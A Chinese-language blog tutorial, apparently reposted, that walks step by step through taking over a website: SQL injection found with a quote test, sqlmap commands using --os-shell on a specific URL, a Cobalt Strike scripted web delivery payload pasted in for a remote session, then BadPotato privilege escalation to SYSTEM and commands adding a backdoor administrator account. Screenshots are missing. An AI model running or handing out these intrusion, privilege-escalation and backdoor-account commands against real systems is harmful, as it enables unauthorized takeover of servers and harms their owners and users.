1. 程式人生 > 實用技巧 >利用cobaltstrike加sqlmap拿下一個網站並提權

利用cobaltstrike加sqlmap拿下一個網站並提權

利用cobaltstrike加sqlmap拿下一個網站並提權
Cobalt Strike是一款基於java的滲透測試神器,常被業界人稱為CS神器。自3.0以後已經不在使用Metasploit框架而作為一個獨立的平臺使用,分為客戶端與服務端,服務端是一個,客戶端可以有多個,非常適合團隊協同作戰,多個攻擊者可以同時連線到一個團隊伺服器上,共享攻擊資源與目標資訊和sessions,可模擬APT做模擬對抗,進行內網滲透。
Cobalt Strike集成了埠轉發、服務掃描,自動化溢位,多模式埠監聽,win exe木馬生成,win dll木馬生成,java木馬生成,office巨集病毒生成,木馬捆綁;釣魚攻擊包括:站點克隆,目標資訊獲取,java執行,瀏覽器自動攻擊等等。

拿到一個網站時,單引號測試是否存在注入點:
在這裡插入圖片描述
在這裡插入圖片描述
資料庫返回錯誤;說明大概率存在注入點。

sqlmap跑一遍,發現存在注入點:
sqlmap.py -u http://10.6.18.106/Info/InfoDetail.aspx?id=421 --batch
在這裡插入圖片描述
利用:sqlmap.py -u http://10.6.18.106/Info/InfoDetail.aspx?id=421 --os-shell --batch,來執行作業系統命令:
在這裡插入圖片描述
之後我們用到cobaltstrike:
開啟cobaltstrike:
在這裡插入圖片描述
在這裡插入圖片描述

新建一個scripted web delivery攻擊,

在這裡插入圖片描述
複製裡面這段程式碼到剛才配置好的sqlmap中,

在這裡插入圖片描述
此時,cobaltstrike上如果有了目標ip,說明攻擊成功!
在這裡插入圖片描述
嘗試建立使用者:shell net user adas /add
在這裡插入圖片描述
失敗!說明許可權不夠~ shell systeminfo 檢視作業系統版本資訊:
在這裡插入圖片描述
在這裡插入圖片描述
伺服器為windows 2012,接下來的思路是:尋找上傳點,配合badpotato.exe嘗試進行提權:
在這裡插入圖片描述
在這裡插入圖片描述
上傳成功!
嘗試提權~
shell C:\nmgeip\BadPotatoNet2.exe “whoami”
在這裡插入圖片描述
可以看到此時的許可權為系統許可權,提權成功!!!
新增使用者:shell C:\nmgeip\BadPotatoNet2.exe “net user lianxi /add”
在這裡插入圖片描述
新增到管理員組:shell C:\nmgeip\BadPotatoNet2.exe “net localgroup administrators lianxi /add”
在這裡插入圖片描述
完成!
在這裡插入圖片描述